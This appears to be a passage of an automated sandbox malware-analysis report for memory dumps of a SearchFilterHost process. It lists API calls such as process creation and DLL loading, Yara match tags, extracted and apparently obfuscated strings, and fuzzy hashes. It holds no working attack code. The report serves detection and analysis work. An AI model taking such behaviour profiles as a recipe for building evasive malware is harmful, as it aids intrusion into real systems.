                                                                                                  Similarity
                                                                                                  • API ID: InitializeUninitialize
                                                                                                  • String ID: @J7<
                                                                                                  • API String ID: 3442037557-2016760708
                                                                                                  • Opcode ID: 58fd8d9c7d0075827cc987af9533c88b75375b09f3e2d2978001d7f1123bde3e
                                                                                                  • Instruction ID: 0168187adeeb5f22bc89034c62461d1f74aac17733faeb9235af79c6c5574fb4
                                                                                                  • Opcode Fuzzy Hash: 58fd8d9c7d0075827cc987af9533c88b75375b09f3e2d2978001d7f1123bde3e
                                                                                                  • Instruction Fuzzy Hash: F83130B6A1060AAFDB00DFD8DC809EFB7B9FF88304B148559E505EB214D775EE458BA0
                                                                                                  APIs
                                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,032A1AF0,032B7E5F,032B551E,032A1AB3), ref: 032A7F93
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorMode
                                                                                                  • String ID:
                                                                                                  • API String ID: 2340568224-0
                                                                                                  • Opcode ID: fe227b56f57054b6a7706e3fe107e47f0ff7fb35ab659a258111ccd3293d00f4
                                                                                                  • Instruction ID: 20163520f54af899ff41e9b4471996b29332e8301d58d7bbbe4b34e405bab346
                                                                                                  • Opcode Fuzzy Hash: fe227b56f57054b6a7706e3fe107e47f0ff7fb35ab659a258111ccd3293d00f4
                                                                                                  • Instruction Fuzzy Hash: 5E01F775524208ABEB08DBECDC42FED77ADDB04750F044269F918DB2C0D636B7908699
                                                                                                  APIs
                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 032A43A2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Load
                                                                                                  • String ID:
                                                                                                  • API String ID: 2234796835-0
                                                                                                  • Opcode ID: ba351a46981eeeefc6d2249afc5c28acff991cf894cb65777e902435abb4b041
                                                                                                  • Instruction ID: abf604fec9255e670901bce0cbf9e375a3d9830d0f33c59d546633006bb5cfc9
                                                                                                  • Opcode Fuzzy Hash: ba351a46981eeeefc6d2249afc5c28acff991cf894cb65777e902435abb4b041
                                                                                                  • Instruction Fuzzy Hash: AF015EB9D1020EBBDB10EAE5DC41FDDB3789B44308F1441A5A9089B241F6B1E784CB91
                                                                                                  APIs
                                                                                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,032A812E,00000010,?,?,?,00000044,?,00000010,032A812E,?,?,?), ref: 032B9673
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateInternalProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 2186235152-0
                                                                                                  • Opcode ID: 84e4f580c2f966e9f9b07fc989e96498ad32f0c506480f3c6e51f6e36c57b017
                                                                                                  • Instruction ID: 336c7b4d0f594cc8bbae8603b6b894ddec28e364f36eb1ac3aaf79f53d56a6db
                                                                                                  • Opcode Fuzzy Hash: 84e4f580c2f966e9f9b07fc989e96498ad32f0c506480f3c6e51f6e36c57b017
                                                                                                  • Instruction Fuzzy Hash: 2201C4B6210208BBCB04DE89DC80EEB77BDAF8C754F408108FA09D7240D630F8518BA4
                                                                                                  APIs
                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03299BA5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2422867632-0
                                                                                                  • Opcode ID: 7c9241d74bd5b347f5f07e7d64a9624fab22b1b1dc3d216eaf8aed92d631286b
                                                                                                  • Instruction ID: f455c1b20532c7846d1dc0ecec8b02c4fdfbf7c32d9c3a38fd43fcd1cdf555a8
                                                                                                  • Opcode Fuzzy Hash: 7c9241d74bd5b347f5f07e7d64a9624fab22b1b1dc3d216eaf8aed92d631286b
                                                                                                  • Instruction Fuzzy Hash: 77F0653735031476E720A1A99C02FD7B35C8B84BA1F14042AF70CEB1C0D595B48142E5
                                                                                                  APIs
                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03299BA5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2422867632-0
                                                                                                  • Opcode ID: bcb19224aaeec15361a6d8bef94220f807efac4f452d77956223e96c51700ec1
                                                                                                  • Instruction ID: ae1efb30f669d52c79f4131b3689cb568fa09aff4776a9cdebb2661e770fd246
                                                                                                  • Opcode Fuzzy Hash: bcb19224aaeec15361a6d8bef94220f807efac4f452d77956223e96c51700ec1
                                                                                                  • Instruction Fuzzy Hash: 07E0923729030476F731B5A99C03FE7669C8F94B90F24052AF708FF2C4D5A5B88182A4
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(032A17E9,?,032B5E28,032A17E9,032B551E,032B5E28,?,032A17E9,032B551E,00001000,?,?,00000000), ref: 032B956F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: 0681289463acc3cc7b52d519a9f1f540006482d51675ae265bd9054e089dee02
                                                                                                  • Instruction ID: ee999836de3710bbfb95a39b6abd0f44def025dbbcf3e2d173674d4d3f304477
                                                                                                  • Opcode Fuzzy Hash: 0681289463acc3cc7b52d519a9f1f540006482d51675ae265bd9054e089dee02
                                                                                                  • Instruction Fuzzy Hash: 10E06576200309BFDA14EE69DC40FAB37ACEFC9710F008019F918AB282D670B9108AB4
                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,46B60F1A,00000007,00000000,00000004,00000000,032A3BBD,000000F4), ref: 032B95BC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 3298025750-0
                                                                                                  • Opcode ID: 531c6c2c2d8dd0a598f6d651127fe8afacc0e6ecc84a87ed1681958ec2130ae6
                                                                                                  • Instruction ID: 83693d722035fd543230f7d62d5adcc0bd4f14634b7b27ba222d22020a638f0e
                                                                                                  • Opcode Fuzzy Hash: 531c6c2c2d8dd0a598f6d651127fe8afacc0e6ecc84a87ed1681958ec2130ae6
                                                                                                  • Instruction Fuzzy Hash: 93E065B6600308BBDA10EE59DC45EDB33ACEFC8710F004409FA1CAB241D6B0B9118AB4
                                                                                                  APIs
                                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 032A819C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  • Opcode ID: 806c54c6b215c547bcfb9bfa05eecf21207386e71b03b5ba7d4a58b437e02490
                                                                                                  • Instruction ID: bc37179d322a3c2dd551ae958a6b666c05849da2e4e4d550febf6593e2533def
                                                                                                  • Opcode Fuzzy Hash: 806c54c6b215c547bcfb9bfa05eecf21207386e71b03b5ba7d4a58b437e02490
                                                                                                  • Instruction Fuzzy Hash: 09E0867526070827FB28FAACDC46FA6735C9B88F64F1C4660F91CDB2C1E578F5918160
                                                                                                  APIs
                                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 032A819C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  • Opcode ID: d785032f748d27a6c0213acb01bf1e209cbf5d0502e61f246228a76359ae6f26
                                                                                                  • Instruction ID: c1ac5a288864933a611516741c97a7e639b6e8bac2e27480bfaeadea68f08a22
                                                                                                  • Opcode Fuzzy Hash: d785032f748d27a6c0213acb01bf1e209cbf5d0502e61f246228a76359ae6f26
                                                                                                  • Instruction Fuzzy Hash: D8E0DF7122070427F728AA6CCC42FA6B3289B48F24F080614F9589F2C1D274F68282A0
                                                                                                  APIs
                                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,032A1AF0,032B7E5F,032B551E,032A1AB3), ref: 032A7F93
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorMode
                                                                                                  • String ID:
                                                                                                  • API String ID: 2340568224-0
                                                                                                  • Opcode ID: 0b2f1d144485d69762a00fbafa5982216ccf80427bc6ec807218d350fbbf8af2
                                                                                                  • Instruction ID: 0d70e323640bb2e76329f049d00ef1f16b6d1c18f864fa6927bf35fdcb98bf18
                                                                                                  • Opcode Fuzzy Hash: 0b2f1d144485d69762a00fbafa5982216ccf80427bc6ec807218d350fbbf8af2
                                                                                                  • Instruction Fuzzy Hash: 12D05E752543057BFA08E6E98C02FA6328C4B14B94F084064FA0CEF2C1EAA5F15041A9
                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(?,00000111), ref: 032A0C77
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 1836367815-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2978302177.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5490000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2978302177.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5490000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                  • API String ID: 0-3558027158
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2978302177.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5490000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (-<v$(osj$(tn`$+fww$+njf$4<v:$7)0$:7)?$<q:e$>+nj$`b(p$b(fw$bew+$f`b($fi`b$fqna$fsnh$fwwk$i`+-$ibc*$k+fw$kndf$ndfs$nhi($njf`$sjk,$snhi$v:7)$wknd
                                                                                                  • API String ID: 0-1767049587
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                  • API String ID: 48624451-2108815105
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                  • API String ID: 48624451-2108815105
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2978302177.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5490000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !9=+$'"+$+ c;$+<<7$<av`$=unw$`~`{$`~`~$w~~a$}|un$~`{}$~`~n
                                                                                                  • API String ID: 0-2347180261
                                                                                                  Strings
                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 051E4725
                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 051E46FC
                                                                                                  • Execute=1, xrefs: 051E4713
                                                                                                  • ExecuteOptions, xrefs: 051E46A0
                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 051E4787
                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 051E4655
                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 051E4742
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                  • API String ID: 0-484625025
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __aulldvrm
                                                                                                  • String ID: +$-$0$0
                                                                                                  • API String ID: 1302938615-699404926
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: %%%u$[$]:%u
                                                                                                  • API String ID: 48624451-2819853543
                                                                                                  Strings
                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 051E02BD
                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 051E02E7
                                                                                                  • RTL: Re-Waiting, xrefs: 051E031E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                  • API String ID: 0-2474120054
                                                                                                  • Opcode ID: bbad7af89f60d3eeb2a00dc886492b2b881e8610c7842e7899ec380964fc3379
                                                                                                  • Instruction ID: ac4b3e139ac6b08220e17c5520bab2e5362f5d3b984cccf9e71c94f49d2d686d
                                                                                                  • Opcode Fuzzy Hash: bbad7af89f60d3eeb2a00dc886492b2b881e8610c7842e7899ec380964fc3379
                                                                                                  • Instruction Fuzzy Hash: 1EE1B234608741AFDB29DF28C888B6AB7E1BF88714F140A1DF5A6CB2D1D7B4D945CB42
                                                                                                  Strings
                                                                                                  • RTL: Resource at %p, xrefs: 051E7B8E
                                                                                                  • RTL: Re-Waiting, xrefs: 051E7BAC
                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 051E7B7F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                  • API String ID: 0-871070163
                                                                                                  • Opcode ID: 317c498e481fb2586b7f27405b7ebd1979d71d9e0a8869e55565adf960ecae52
                                                                                                  • Instruction ID: 110107c3ab01009a30fb74e6085c53e02b1a6b1dea88f0f6e29e8e9e55eb8f17
                                                                                                  • Opcode Fuzzy Hash: 317c498e481fb2586b7f27405b7ebd1979d71d9e0a8869e55565adf960ecae52
                                                                                                  • Instruction Fuzzy Hash: 3141033A3087829FD725DE24C840B6AB7E6FF88720F140A1DE95AD7681DB71E805CB91
                                                                                                  APIs
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 051E728C
                                                                                                  Strings
                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 051E7294
                                                                                                  • RTL: Resource at %p, xrefs: 051E72A3
                                                                                                  • RTL: Re-Waiting, xrefs: 051E72C1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                  • API String ID: 885266447-605551621
                                                                                                  • Opcode ID: 28777546cb4fa4ab3d9460f02b453d83da27aed10c55c4ccad7a5b224ed6d7ac
                                                                                                  • Instruction ID: e1c707b77f48934a8275cd0d8606c776c8cbca61e8a34a7f3e726d156974c87c
                                                                                                  • Opcode Fuzzy Hash: 28777546cb4fa4ab3d9460f02b453d83da27aed10c55c4ccad7a5b224ed6d7ac
                                                                                                  • Instruction Fuzzy Hash: 19411336708683ABE721DE24CC45FAAB7A6FF44710F100619F956EB280DB31E842DBD1
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: %%%u$]:%u
                                                                                                  • API String ID: 48624451-3050659472
                                                                                                  • Opcode ID: e448d0a0026af209bfb238caac922fa91c1f3d9aa0b6c604c10da63391a5818c
                                                                                                  • Instruction ID: 251768695362a3031d03aeabd0357b2f18f53cb3da106c86459e9399301b98a4
                                                                                                  • Opcode Fuzzy Hash: e448d0a0026af209bfb238caac922fa91c1f3d9aa0b6c604c10da63391a5818c
                                                                                                  • Instruction Fuzzy Hash: 4431867AA10229EFDB24DE28CC44BEEB7F8FF44610F444555E849E3240EB31AA549BA0
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __aulldvrm
                                                                                                  • String ID: +$-
                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                  • Instruction ID: 908f4e7719bae0f80a0a4c6a53659cb52a6cf3c341611b2c29cf633135e1073e
                                                                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                  • Instruction Fuzzy Hash: FF91A270E0421A9FFF28DE69C880AFEB7A6FF84760F14451EE865E72C0D7B489818754
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp
